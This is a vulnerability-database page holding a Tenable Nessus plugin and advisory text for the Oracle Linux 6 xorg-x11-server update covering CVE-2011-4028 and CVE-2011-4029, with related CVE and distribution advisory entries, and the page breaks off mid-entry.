ID ORACLELINUX_ELSA-2012-0939.NASL Type nessus Reporter This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2013-07-12T00:00:00
Description
From Red Hat Security Advisory 2012:0939 :
Updated xorg-x11-server packages that fix two security issues and
several bugs are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
X.Org is an open source implementation of the X Window System. It
provides the basic low-level functionality that full-fledged graphical
user interfaces are designed upon.
A flaw was found in the way the X.Org server handled lock files. A
local user with access to the system console could use this flaw to
determine the existence of a file in a directory not accessible to the
user, via a symbolic link attack. (CVE-2011-4028)
A race condition was found in the way the X.Org server managed
temporary lock files. A local attacker could use this flaw to perform
a symbolic link attack, allowing them to make an arbitrary file world
readable, leading to the disclosure of sensitive information.
(CVE-2011-4029)
Red Hat would like to thank the researcher with the nickname vladz for
reporting these issues.
This update also fixes the following bugs :
Prior to this update, the KDE Display Manager (KDM) could pass
invalid 24bpp pixmap formats to the X server. As a consequence, the X
server could unexpectedly abort. This update modifies the underlying
code to pass the correct formats. (BZ#651934, BZ#722860)
Prior to this update, absolute input devices, like the stylus of a
graphic tablet, could become unresponsive in the right-most or
bottom-most screen if the X server was configured as a multi-screen
setup through multiple 'Device' sections in the xorg.conf file. This
update changes the screen crossing behavior so that absolute devices
are always mapped across all screens. (BZ#732467)
Prior to this update, the misleading message 'Session active, not
inhibited, screen idle. If you see this test, your display server is
broken and you should notify your distributor.' could be displayed
after resuming the system or re-enabling the display, and included a
URL to an external web page. This update removes this message.
(BZ#748704)
Prior to this update, the erroneous input handling code of the
Xephyr server disabled screens on a screen crossing event. The focus
was only on the screen where the mouse was located and only this
screen was updated when the Xephyr nested X server was configured in a
multi-screen setup. This update removes this code and Xephyr now
correctly updates screens in multi-screen setups. (BZ#757792)
Prior to this update, raw events did not contain relative axis
values. As a consequence, clients which relied on relative values for
functioning did not behave as expected. This update sets the values to
the original driver values instead of the already transformed values.
Now, raw events contain relative axis values as expected. (BZ#805377)
All users of xorg-x11-server are advised to upgrade to these updated
packages, which correct these issues. All running X.Org server
instances must be restarted for this update to take effect.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0939 and
# Oracle Linux Security Advisory ELSA-2012-0939 respectively.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(68561);
script_version("1.9");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");
script_cve_id("CVE-2011-4028", "CVE-2011-4029");
script_bugtraq_id(50193, 50196);
script_xref(name:"RHSA", value:"2012:0939");
script_name(english:"Oracle Linux 6 : xorg-x11-server (ELSA-2012-0939)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:"The remote Oracle Linux host is missing one or more security updates."
);
script_set_attribute(
attribute:"description",
value:
"From Red Hat Security Advisory 2012:0939 :
Updated xorg-x11-server packages that fix two security issues and
several bugs are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having low
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
X.Org is an open source implementation of the X Window System. It
provides the basic low-level functionality that full-fledged graphical
user interfaces are designed upon.
A flaw was found in the way the X.Org server handled lock files. A
local user with access to the system console could use this flaw to
determine the existence of a file in a directory not accessible to the
user, via a symbolic link attack. (CVE-2011-4028)
A race condition was found in the way the X.Org server managed
temporary lock files. A local attacker could use this flaw to perform
a symbolic link attack, allowing them to make an arbitrary file world
readable, leading to the disclosure of sensitive information.
(CVE-2011-4029)
Red Hat would like to thank the researcher with the nickname vladz for
reporting these issues.
This update also fixes the following bugs :
* Prior to this update, the KDE Display Manager (KDM) could pass
invalid 24bpp pixmap formats to the X server. As a consequence, the X
server could unexpectedly abort. This update modifies the underlying
code to pass the correct formats. (BZ#651934, BZ#722860)
* Prior to this update, absolute input devices, like the stylus of a
graphic tablet, could become unresponsive in the right-most or
bottom-most screen if the X server was configured as a multi-screen
setup through multiple 'Device' sections in the xorg.conf file. This
update changes the screen crossing behavior so that absolute devices
are always mapped across all screens. (BZ#732467)
* Prior to this update, the misleading message 'Session active, not
inhibited, screen idle. If you see this test, your display server is
broken and you should notify your distributor.' could be displayed
after resuming the system or re-enabling the display, and included a
URL to an external web page. This update removes this message.
(BZ#748704)
* Prior to this update, the erroneous input handling code of the
Xephyr server disabled screens on a screen crossing event. The focus
was only on the screen where the mouse was located and only this
screen was updated when the Xephyr nested X server was configured in a
multi-screen setup. This update removes this code and Xephyr now
correctly updates screens in multi-screen setups. (BZ#757792)
* Prior to this update, raw events did not contain relative axis
values. As a consequence, clients which relied on relative values for
functioning did not behave as expected. This update sets the values to
the original driver values instead of the already transformed values.
Now, raw events contain relative axis values as expected. (BZ#805377)
All users of xorg-x11-server are advised to upgrade to these updated
packages, which correct these issues. All running X.Org server
instances must be restarted for this update to take effect."
);
script_set_attribute(
attribute:"see_also",
value:"https://oss.oracle.com/pipermail/el-errata/2012-July/002912.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected xorg-x11-server packages."
);
script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xdmx");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xephyr");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xnest");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xorg");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-Xvfb");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-common");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:xorg-x11-server-source");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/07/03");
script_set_attribute(attribute:"patch_publication_date", value:"2012/07/02");
script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Oracle Linux Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
flag = 0;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xdmx-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xephyr-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xnest-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xorg-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-Xvfb-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-common-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-devel-1.10.6-1.el6")) flag++;
if (rpm_check(release:"EL6", reference:"xorg-x11-server-source-1.10.6-1.el6")) flag++;
if (flag)
{
if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());
else security_note(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc");
}
{"id": "ORACLELINUX_ELSA-2012-0939.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 6 : xorg-x11-server (ELSA-2012-0939)", "description": "From Red Hat Security Advisory 2012:0939 :\n\nUpdated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.", "published": "2013-07-12T00:00:00", "modified": "2013-07-12T00:00:00", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/68561", "reporter": "This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-July/002912.html"], "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "type": "nessus", "lastseen": "2021-01-17T12:47:01", "edition": 22, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4029", "CVE-2011-4028"]}, {"type": "gentoo", "idList": ["GLSA-201110-19"]}, {"type": "centos", "idList": ["CESA-2012:0939"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0227-1", "SUSE-SU-2011:1292-1"]}, {"type": "redhat", "idList": ["RHSA-2012:0303", "RHSA-2012:0939"]}, {"type": "amazon", "idList": ["ALAS-2012-104"]}, {"type": "openvas", "idList": ["OPENVAS:881153", "OPENVAS:1361412562310850266", "OPENVAS:70617", "OPENVAS:1361412562310120267", "OPENVAS:136141256231070617", "OPENVAS:1361412562310870775", "OPENVAS:70782", "OPENVAS:850266", "OPENVAS:870775", "OPENVAS:1361412562310881153"]}, {"type": "nessus", "idList": ["SUSE_11_XORG-X11-SERVER-DMX-120410.NASL", "GENTOO_GLSA-201110-19.NASL", "FREEBSD_PKG_8441957CF9B411E0A78ABCAEC565249C.NASL", "SUSE_11_3_XORG-X11-XVNC-111201.NASL", "REDHAT-RHSA-2012-0939.NASL", "SL_20120620_XORG_X11_SERVER_ON_SL6_X.NASL", "SUSE_11_XORG-X11-XVNC-111124.NASL", "ALA_ALAS-2012-104.NASL", "CENTOS_RHSA-2012-0939.NASL", "SOLARIS11_XORG_20120417.NASL"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0303", "ELSA-2012-0939"]}, {"type": "freebsd", "idList": ["8441957C-F9B4-11E0-A78A-BCAEC565249C"]}, {"type": "ubuntu", "idList": ["USN-1232-3", "USN-1232-2", "USN-1232-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11984", "SECURITYVULNS:DOC:27170"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:106307"]}, {"type": "exploitdb", "idList": ["EDB-ID:18040"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BB0D1D84B91708D4480C30F833A625B6"]}, {"type": "seebug", "idList": ["SSV:72273"]}, {"type": "fedora", "idList": ["FEDORA:A13DB60C7030", "FEDORA:593706093B2E", "FEDORA:A5A9D608A4BC"]}], "modified": "2021-01-17T12:47:01", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-17T12:47:01", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0939 and \n# Oracle Linux Security Advisory ELSA-2012-0939 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68561);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_bugtraq_id(50193, 50196);\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"Oracle Linux 6 : xorg-x11-server (ELSA-2012-0939)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0939 :\n\nUpdated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-July/002912.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-devel-1.10.6-1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xorg-x11-server-source-1.10.6-1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68561", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:xorg-x11-server-Xdmx", "p-cpe:/a:oracle:linux:xorg-x11-server-common", "p-cpe:/a:oracle:linux:xorg-x11-server-Xnest", "p-cpe:/a:oracle:linux:xorg-x11-server-Xorg", "p-cpe:/a:oracle:linux:xorg-x11-server-Xvfb", "p-cpe:/a:oracle:linux:xorg-x11-server-source", "p-cpe:/a:oracle:linux:xorg-x11-server-Xephyr", "p-cpe:/a:oracle:linux:xorg-x11-server-devel"], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:07", "description": "The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to change the permissions of arbitrary files to 444, read those files, and possibly cause a denial of service (removed execution permission) via a symlink attack on a temporary lock file.", "edition": 7, "cvss3": {}, "published": "2012-07-03T19:55:00", "title": "CVE-2011-4029", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4029"], "modified": "2020-08-24T17:14:00", "cpe": ["cpe:/a:x.org:x_server:1.11.1", "cpe:/a:x.org:x_server:1.11.0"], "id": "CVE-2011-4029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4029", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:x.org:x_server:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:x.org:x_server:1.11.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:07", "description": "The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to determine the existence of arbitrary files via a symlink attack on a temporary lock file, which is handled differently if the file exists.", "edition": 7, "cvss3": {}, "published": "2012-07-03T19:55:00", "title": "CVE-2011-4028", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4028"], "modified": "2020-08-24T17:14:00", "cpe": ["cpe:/a:x.org:x_server:1.11.1", "cpe:/a:x.org:x_server:1.11.0"], "id": "CVE-2011-4028", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4028", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:x.org:x_server:1.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:x.org:x_server:1.11.1:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "### Background\n\nThe X Window System is a graphical windowing system based on a client/server model. \n\n### Description\n\nvladz reported the following vulnerabilities in the X.Org X server:\n\n * The X.Org X server follows symbolic links when trying to access the lock file for a X display, showing a predictable behavior depending on the file type of the link target (CVE-2011-4028). \n * The X.Org X server lock file mechanism allows for a race condition to cause the X server to modify the file permissions of an arbitrary file to 0444 (CVE-2011-4029). \n\n### Impact\n\nA local attacker could exploit these vulnerabilities to disclose information by making arbitrary files on a system world-readable or gain information whether a specified file exists on the system and whether it is a file, directory, or a named pipe. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.9.5-r1\"\n \n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-base/xorg-server-1.10.4-r1\"", "edition": 1, "modified": "2011-10-22T00:00:00", "published": "2011-10-22T00:00:00", "id": "GLSA-201110-19", "href": "https://security.gentoo.org/glsa/201110-19", "type": "gentoo", "title": "X.Org X Server: Multiple vulnerabilities", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:26:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0939\n\n\nX.Org is an open source implementation of the X Window System. It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A local\nuser with access to the system console could use this flaw to determine the\nexistence of a file in a directory not accessible to the user, via a\nsymbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed temporary\nlock files. A local attacker could use this flaw to perform a symbolic link\nattack, allowing them to make an arbitrary file world readable, leading to\nthe disclosure of sensitive information. (CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the KDE Display Manager (KDM) could pass invalid\n24bpp pixmap formats to the X server. As a consequence, the X server could\nunexpectedly abort. This update modifies the underlying code to pass the\ncorrect formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or bottom-most\nscreen if the X server was configured as a multi-screen setup through\nmultiple \"Device\" sections in the xorg.conf file. This update changes the\nscreen crossing behavior so that absolute devices are always mapped across\nall screens. (BZ#732467)\n\n* Prior to this update, the misleading message \"Session active, not\ninhibited, screen idle. If you see this test, your display server is broken\nand you should notify your distributor.\" could be displayed after resuming\nthe system or re-enabling the display, and included a URL to an external\nweb page. This update removes this message. (BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the Xephyr\nserver disabled screens on a screen crossing event. The focus was only on\nthe screen where the mouse was located and only this screen was updated\nwhen the Xephyr nested X server was configured in a multi-screen setup.\nThis update removes this code and Xephyr now correctly updates screens in\nmulti-screen setups. (BZ#757792)\n\n* Prior to this update, raw 